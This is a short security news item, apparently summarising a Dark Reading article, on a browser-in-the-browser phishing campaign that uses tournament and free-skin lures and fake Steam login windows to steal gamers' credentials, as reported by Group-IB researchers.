"Steam Gaming Phish Showcases Browser-in-Browser Threat"

Attackers have been targeting Steam online gaming platform users with a new phishing tactic involving authentic-looking fake browser windows to steal credentials and take control of accounts. The widespread campaign serves as a warning to businesses that the novel technique should be on their security radars. The phishing technique, called "browser-in-the-browser," was discovered about seven months ago by a researcher known as "mr.d0x." The method entails opening a pop-up window or a new tab that appears to be any other browser window. According to Group-IB researchers, this window is actually a phishing page that steals credentials, allowing attackers to defraud gamers on Steam of potentially thousands of dollars. Although targeting Steam users is not new, using a browser-in-the-browser method is, and it is why this recent campaign is succeeding where others have failed, according to Group-Ivan IB's Lebedev, head of CERT-GIB anti-phishing and global cooperation group, and Dmitry Eroshev, CERT-GIB analyst. Browser-in-browser phishing begins similarly to a traditional phishing campaign, with a malicious message containing some sort of offer. According to the researchers, in the case of the Steam campaign, attackers send a message to a Steam user asking them to join a team for a tournament within the platform, vote for the user's favorite team, or buy discounted tickets to cyber-sport events, among other things. The researchers have also seen attacks that enticed viewers of a popular gameplay video to visit another resource in order to receive a free in-game skin. This lure displays an ad redirecting users to the phishing website both on the screen and in the video description. Clicking on almost any button on one of the bait webpages opens an account data-entry form that looks like a legitimate Steam window. The page includes a fake green lock sign, a fake URL field that can be copied, and even an additional Steam Guard window for two-factor authentication (2FA) to make it appear authentic. This article continues to discuss the browser-in-the-browser phishing campaign targeting Steam users. 

Dark Reading reports "Steam Gaming Phish Showcases Browser-in-Browser Threat"